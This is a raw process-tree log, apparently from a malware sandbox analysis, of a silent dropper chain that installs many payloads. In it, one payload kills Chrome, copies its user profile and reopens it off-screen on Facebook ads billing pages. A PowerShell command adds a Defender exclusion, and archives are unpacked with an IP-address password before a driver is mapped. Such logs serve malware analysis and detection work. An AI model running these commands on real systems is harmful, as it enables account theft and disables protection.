C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1752 /prefetch:830⤵PID:7780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:230⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:130⤵PID:9236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:130⤵PID:5592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:130⤵PID:7388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:130⤵PID:10004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:130⤵PID:9928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4412 /prefetch:830⤵PID:6484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4436 /prefetch:830⤵PID:9708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4924 /prefetch:830⤵PID:9348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5028 /prefetch:830⤵PID:4016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1400 /prefetch:830⤵PID:7568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9381904308218835470,15790962909475309305,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4948 /prefetch:830⤵PID:6484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mzzl5knhfgl\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mzzl5knhfgl\Setup3310.exe" /Verysilent /subid=57728⤵PID:8296
-
C:\Users\Admin\AppData\Local\Temp\is-0OUEG.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OUEG.tmp\Setup3310.tmp" /SL5="$20696,802346,56832,C:\Users\Admin\AppData\Local\Temp\mzzl5knhfgl\Setup3310.exe" /Verysilent /subid=57729⤵PID:9124
-
C:\Users\Admin\AppData\Local\Temp\is-PRFCV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PRFCV.tmp\Setup.exe" /Verysilent30⤵PID:9632
-
C:\Users\Admin\AppData\Local\Temp\is-R6LEK.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-R6LEK.tmp\Setup.tmp" /SL5="$30712,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PRFCV.tmp\Setup.exe" /Verysilent31⤵PID:9716
-
C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\PictureLAb.exe" /Verysilent32⤵PID:9320
-
C:\Users\Admin\AppData\Local\Temp\is-2J6JH.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-2J6JH.tmp\PictureLAb.tmp" /SL5="$90266,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-0B680.tmp\PictureLAb.exe" /Verysilent33⤵PID:5232
-
C:\Users\Admin\AppData\Local\Temp\is-Q1R1M.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q1R1M.tmp\Setup.exe" /VERYSILENT34⤵PID:6596
-
C:\Users\Admin\AppData\Local\Temp\is-JGK19.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JGK19.tmp\Setup.tmp" /SL5="$30620,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-Q1R1M.tmp\Setup.exe" /VERYSILENT35⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\is-FSF0G.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-FSF0G.tmp\def.exe" /S /UID=lab21436⤵PID:9816
-
C:\Users\Admin\AppData\Local\Temp\c5-85c41-87f-70681-7a09c17cece2c\Gobozhuzhypae.exe"C:\Users\Admin\AppData\Local\Temp\c5-85c41-87f-70681-7a09c17cece2c\Gobozhuzhypae.exe"37⤵PID:7228
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5dt31yx.5l1\lod.exe & exit38⤵PID:9764
-
C:\Users\Admin\AppData\Local\Temp\d5dt31yx.5l1\lod.exeC:\Users\Admin\AppData\Local\Temp\d5dt31yx.5l1\lod.exe39⤵PID:11088
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ40⤵PID:10428
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt40⤵PID:10364
-
C:\Windows\SysWOW64\cmd.execmd41⤵PID:10424
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rldu2xgx.bsq\customer4.exe & exit38⤵PID:7204
-
C:\Users\Admin\AppData\Local\Temp\rldu2xgx.bsq\customer4.exeC:\Users\Admin\AppData\Local\Temp\rldu2xgx.bsq\customer4.exe39⤵PID:9568
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"40⤵PID:11456
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1q2hmx2j.wdd\askinstall18.exe & exit38⤵PID:11364
-
C:\Users\Admin\AppData\Local\Temp\1q2hmx2j.wdd\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\1q2hmx2j.wdd\askinstall18.exe39⤵PID:11936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe40⤵PID:11380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe41⤵
- Kills process with taskkill
PID:11772
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y40⤵PID:7724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/40⤵PID:11016
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2041⤵PID:11060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=2252 /prefetch:841⤵PID:11576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:141⤵PID:12064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:141⤵PID:11916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1676 /prefetch:841⤵PID:1244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:241⤵PID:1236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:141⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:141⤵PID:11740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:141⤵PID:11704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4592 /prefetch:841⤵PID:2208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4460 /prefetch:841⤵PID:10088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1664 /prefetch:841⤵PID:5552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1884 /prefetch:841⤵PID:10740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1708 /prefetch:841⤵PID:5424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=3864 /prefetch:841⤵PID:8232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5004 /prefetch:841⤵PID:1196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4492 /prefetch:841⤵PID:7272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4568 /prefetch:841⤵PID:10940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4560 /prefetch:841⤵PID:2716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5296 /prefetch:841⤵PID:10320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:141⤵PID:12136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5800 /prefetch:841⤵PID:8884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4496 /prefetch:841⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5352 /prefetch:841⤵PID:11872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5228 /prefetch:841⤵PID:4560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=5260 /prefetch:841⤵PID:10108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=4872 /prefetch:841⤵PID:10236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,7454737545993658058,12091239065932563432,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:141⤵PID:10792
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aja21vg.c5s\md7_7dfj.exe & exit38⤵PID:12092
-
C:\Users\Admin\AppData\Local\Temp\2aja21vg.c5s\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\2aja21vg.c5s\md7_7dfj.exe39⤵PID:11860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2zxbwgfi.lka\privacytools5.exe & exit38⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\2zxbwgfi.lka\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2zxbwgfi.lka\privacytools5.exe39⤵PID:10464
-
C:\Users\Admin\AppData\Local\Temp\2zxbwgfi.lka\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2zxbwgfi.lka\privacytools5.exe40⤵PID:11400
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmvwgbb0.jly\GcleanerWW.exe /mixone & exit38⤵PID:9052
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p4u3jupi.ajj\setup.exe /8-2222 & exit38⤵PID:10628
-
C:\Users\Admin\AppData\Local\Temp\p4u3jupi.ajj\setup.exeC:\Users\Admin\AppData\Local\Temp\p4u3jupi.ajj\setup.exe /8-222239⤵PID:11180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Late-Wave"40⤵PID:11308
-
-
C:\Program Files (x86)\Late-Wave\7za.exe"C:\Program Files (x86)\Late-Wave\7za.exe" e -p154.61.71.51 winamp-plugins.7z40⤵PID:7268
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Late-Wave\setup.exe" -map "C:\Program Files (x86)\Late-Wave\WinmonProcessMonitor.sys""40⤵PID:5512
-
C:\Program Files (x86)\Late-Wave\setup.exe"C:\Program Files (x86)\Late-Wave\setup.exe" -map "C:\Program Files (x86)\Late-Wave\WinmonProcessMonitor.sys"41⤵PID:5456
-
-
-
C:\Program Files (x86)\Late-Wave\7za.exe"C:\Program Files (x86)\Late-Wave\7za.exe" e -p154.61.71.51 winamp.7z40⤵PID:4260
-
-
C:\Program Files (x86)\Late-Wave\setup.exe"C:\Program Files (x86)\Late-Wave\setup.exe" /8-222240⤵PID:6868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hfdxpnvw.j24\MultitimerFour.exe & exit38⤵PID:11000
-
C:\Users\Admin\AppData\Local\Temp\hfdxpnvw.j24\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\hfdxpnvw.j24\MultitimerFour.exe39⤵PID:11148
-
C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10440⤵PID:6388
-
C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe" 1 3.1615300111.6047860f74b8c 10441⤵PID:11684
-
C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4U8MWVG9MP\multitimer.exe" 2 3.1615300111.6047860f74b8c42⤵PID:7396
-
C:\Users\Admin\AppData\Local\Temp\d0bq0ttnv2p\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\d0bq0ttnv2p\askinstall24.exe"43⤵PID:12128
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe44⤵PID:1688
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe45⤵
- Kills process with taskkill
PID:9696
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y44⤵PID:10224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/44⤵PID:2648
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2045⤵PID:4200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1732 /prefetch:845⤵PID:9684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1672,18017244444732007515,17612265988045167566,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1684 /prefetch:245⤵PID:6876
-
-
